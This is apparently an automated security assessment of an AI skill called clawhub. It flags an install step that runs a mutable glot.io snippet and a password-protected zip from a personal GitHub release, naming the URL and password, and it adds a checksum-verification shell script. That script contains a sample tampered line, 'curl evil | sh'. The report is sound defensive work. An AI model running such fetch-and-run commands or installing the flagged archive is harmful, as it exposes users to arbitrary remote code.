Trust Assessment
clawhub received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings (1 critical, 1 high, 0 medium, 1 low). In order of severity: the macOS `openclawcli` installation runs an untrusted `glot.io` snippet (critical); the Windows `openclawcli` installation downloads a password-protected zip from a personal GitHub release (high); and the `clawhub` CLI is installed via npm without a pinned version (low).
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100; all three findings were raised by that layer, and all three concern how the skill tells users to fetch and install software.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | macOS `openclawcli` installation uses untrusted `glot.io` snippet. The skill instructs users to execute an installation command fetched from a `glot.io` snippet. `glot.io` is a code-sharing platform whose content can be changed by the author at any time or altered if the account is compromised, so a malicious actor could modify the script to run arbitrary commands on the user's system without notice. Recommendation: replace the `glot.io` link with a versioned, signed, officially hosted installer script or package (a dedicated package manager, an official GitHub release, or a self-hosted immutable script) and verify a published checksum before executing it. | LLM | SKILL.md:14 |
| HIGH | Windows `openclawcli` installation from personal GitHub release with password-protected zip. The skill instructs users to download `openclawcli.zip` from a direct GitHub release URL (`https://github.com/Ddoy233/openclawcli/releases/download/latest/openclawcli.zip`). This presents three supply chain risks: (1) untrusted source: the release comes from a personal GitHub account (`Ddoy233`) rather than an official organization; (2) unversioned `latest`: the asset behind a `latest` URL can change without notice, so its integrity cannot be pinned or audited; (3) password-protected ZIP: requiring a password (`openclaw`) to extract is suspicious, since an encrypted archive defeats antivirus scanning and makes it harder to inspect the contents before installing. Recommendation: host the `openclawcli` executable on an official, trusted domain, publish versioned releases with SHA-256 hashes for integrity verification, remove the password protection from the archive, and sign the executable. | LLM | SKILL.md:12 |
| LOW | `clawhub` CLI installed without specific version. The installation instruction `npm i -g clawhub` installs the `clawhub` package globally without specifying a version. While common for CLI tools, this can lead to unexpected updates, breaking changes, or inadvertently installing a compromised version if the package's `latest` dist-tag is maliciously updated in the npm registry. Recommendation: install a specific major or minor version range (e.g., `npm i -g clawhub@1.x.x`) to limit unexpected upstream changes; for production environments, pin to an exact version (e.g., `npm i -g clawhub@1.2.3`). | LLM | SKILL.md:25 |
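All three findings share one remediation pattern: fetch a pinned artifact to disk, verify it against a published hash, and only then run or extract it. The POSIX shell script below is an added example written for this report; it is not code from the clawhub skill, from `openclawcli`, or from SkillShield. The installer contents, the pinned hash (the SHA-256 of the string `hello` plus newline) and the release tag `v1.2.3` are constructed for illustration so the script runs offline; a real pin would come from the vendor's signed release notes.

```shell
#!/bin/sh
# Added example, not code from the clawhub skill or from SkillShield.
# Pattern: download to a file, verify a pinned SHA-256, then run or extract.
# Never pipe a mutable snippet (a glot.io paste, a "latest" URL) into sh.
set -eu

# Print the SHA-256 of a file; sha256sum on Linux, shasum on macOS.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_pinned FILE EXPECTED_SHA256
# Returns 0 when the file hashes to the expected value, 1 otherwise.
verify_pinned() {
  actual=$(sha256_of "$1")
  if [ "$actual" = "$2" ]; then
    return 0
  fi
  printf 'checksum mismatch for %s\n  expected %s\n  actual   %s\n' \
    "$1" "$2" "$actual" >&2
  return 1
}

# release_url OWNER REPO TAG ASSET
# Builds a GitHub release asset URL for an explicit tag and refuses the
# moving "latest" target that the HIGH finding objects to.
release_url() {
  case "$3" in
    latest|"") echo "refusing unpinned release tag '$3'" >&2; return 1 ;;
  esac
  printf 'https://github.com/%s/%s/releases/download/%s/%s\n' "$1" "$2" "$3" "$4"
}

# fetch_and_verify URL DEST EXPECTED_SHA256
# Downloads to DEST first so the bytes that are hashed are the bytes that run.
fetch_and_verify() {
  curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
  verify_pinned "$2" "$3"
}

# Constructed pin: sha256("hello\n"). Stands in for a vendor-published hash.
PINNED_SHA256=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03

demo() {
  dir=$(mktemp -d)
  printf 'hello\n' > "$dir/install.sh"                   # constructed genuine artifact
  printf 'hello\ncurl evil | sh\n' > "$dir/tampered.sh"  # constructed modified artifact

  verify_pinned "$dir/install.sh" "$PINNED_SHA256" && echo "install.sh: OK, safe to run"
  verify_pinned "$dir/tampered.sh" "$PINNED_SHA256" || echo "tampered.sh: rejected"

  # Pinned coordinates (tag v1.2.3 is an assumed example) instead of .../download/latest/...
  release_url Ddoy233 openclawcli v1.2.3 openclawcli.zip
  release_url Ddoy233 openclawcli latest openclawcli.zip || echo "latest: refused"

  # Pin the npm package too (LOW finding); shown, not executed here.
  echo 'npm i -g clawhub@1.2.3   # exact version, not a floating dist-tag'
  rm -rf "$dir"
}

demo
```

`fetch_and_verify` is the piece that would replace the skill's `glot.io` and `latest` download steps: `curl` writes to a file, `verify_pinned` compares it to a hash the user obtained out of band, and execution happens only after a match. The password-protected zip has no equivalent fix on the client side; the archive has to be published unencrypted (and ideally signed) for a hash or scanner to mean anything.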
Full report: https://skillshield.io/report/9b24216c0d94d4af